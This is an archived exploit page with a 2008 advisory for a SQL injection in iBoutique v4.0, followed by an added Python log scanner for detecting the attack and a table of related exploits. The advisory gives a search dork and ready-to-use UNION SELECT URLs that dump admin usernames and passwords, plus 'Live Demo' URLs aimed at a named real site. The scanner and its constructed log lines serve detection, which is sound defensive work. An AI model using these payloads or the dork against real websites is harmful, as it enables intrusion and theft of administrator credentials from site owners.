################################################################
# darkc0de crew                                                #
# est.2007                                  forum.darkc0de.com #
################################################################
# --d3hydr8 - rsauron - baltazar - sinner_01 - C1c4Tr1Z - beenu#
# --- FeDeReR - DON - OutLawz - MAGE -JeTFyrE - Bond           #
# and all darkc0de members                                  ---#
################################################################
#
# Author: r45c4l and h4x0r
# Home  : www.darkc0de.com
# Email : r45c4l@hotmail.com, vaibhavaher@gmail.com
# Share the c0de!
#
################################################################
#
# Exploit: iBoutique v4.0 (product&cat) Remote SQL Injection Vulnerability
# App Name: iBoutique v4.0
# App Home: http://www.netartmedia.net/iboutique/
# App Demo: http://www.netartmedia.net/iboutique/demo.html
#
#################################################################
# Dork: Powered by iBoutique v4.0
#
# POC:
#
# For username :
# http://site.com/iboutique/index.php?mod=products&cat=-18+union+all+select+1,2,3,username,5,6+from+websiteadmin_admin_users--
#
# For password :
# http://site.com/iboutique/index.php?mod=products&cat=-18+union+all+select+1,2,3,password,5,6+from+websiteadmin_admin_users--
#
# Live Demo:
# http://www.wscreator.com/iboutique/index.php?mod=products&cat=-18+union+all+select+1,2,3,username,5,6+from+websiteadmin_admin_users--
# http://www.wscreator.com/iboutique/index.php?mod=products&cat=-18+union+all+select+1,2,3,password,5,6+from+websiteadmin_admin_users--
#
################################################################
# Vuln Discovered 12th Sep 2008

# milw0rm.com [2008-09-12]
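For defenders reviewing web server logs for this issue, the following is an added example (not part of the advisory and not vendor code) that flags requests to the `mod=products` page whose `cat` value is not a plain integer. It assumes combined-format access logs and that legitimate category ids are non-negative integers; the sample log lines, including the `mod=news` request, are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed access-log lines (combined log format); not real traffic.
SAMPLE_LOG = "\n".join([
    '198.51.100.7 - - [12/Sep/2008:10:01:02 +0000] "GET /iboutique/index.php?mod=products&cat=18 HTTP/1.1" 200 5120',
    '198.51.100.9 - - [12/Sep/2008:10:03:44 +0000] "GET /iboutique/index.php?mod=products&cat=-18+union+all+select+1,2,3,username,5,6+from+websiteadmin_admin_users-- HTTP/1.1" 200 4811',
    '198.51.100.9 - - [12/Sep/2008:10:04:10 +0000] "GET /iboutique/index.php?mod=products&cat=18%27 HTTP/1.1" 200 312',
    '203.0.113.5 - - [12/Sep/2008:10:05:00 +0000] "GET /iboutique/index.php?mod=news&cat=abc HTTP/1.1" 200 900',
])

REQUEST_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST|HEAD) (\S+) [^"]*" (\d{3})')
UNION_RE = re.compile(r"\bunion\b.*\bselect\b", re.S)
ADMIN_TABLE = "websiteadmin_admin_users"  # table named in the advisory


def classify_cat(value):
    """Return None for a plain category id, otherwise a severity label."""
    if re.fullmatch(r"\d{1,10}", value):  # assumption: ids are non-negative ints
        return None
    lowered = value.lower()
    if UNION_RE.search(lowered):
        # Reading the admin table is the highest-priority case to triage.
        return "credential-dump" if ADMIN_TABLE in lowered else "union-select"
    return "non-integer"


def scan(log_text):
    """Return (client, label, status) for each suspicious products/cat request."""
    findings = []
    for line in log_text.splitlines():
        match = REQUEST_RE.match(line)
        if not match:
            continue
        client, target, status = match.groups()
        url = urlsplit(target)
        if not url.path.lower().endswith("/index.php"):
            continue
        # parse_qs percent-decodes and turns '+' into spaces before matching.
        params = parse_qs(url.query, keep_blank_values=True)
        if params.get("mod", [""])[0] != "products":
            continue  # the advisory covers the products module only
        for value in params.get("cat", []):
            label = classify_cat(value)
            if label:
                findings.append((client, label, int(status)))
    return findings
```

A `credential-dump` hit answered with status 200 means the stored admin passwords should be treated as exposed and rotated; the same integer check applied server-side before the value reaches the query is the corresponding input-validation fix.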
Related Exploits
Trying to match CVEs (1): CVE-2008-4354
Trying to match OSVDBs (1): 48127
Date | Title | Author |
---|---|---|
2010-06-20 | iBoutique - 'page' SQL Injection / Cross-Site Scripting | L0rd CrusAd3r |
2012-07-20 | iBoutique 4.0 - 'key' SQL Injection | SecPod Rese... |
2012-06-19 | iBoutique eCommerce 4.0 - Multiple Web Vulnerabilities | Vulnerabili... |
2009-09-15 | iBoutique.MALL 1.2 - 'cat' Blind SQL Injection | InjEctOr5 |
2010-06-28 | Netartmedia iBoutique.MALL - SQL Injection | Sid3^effects |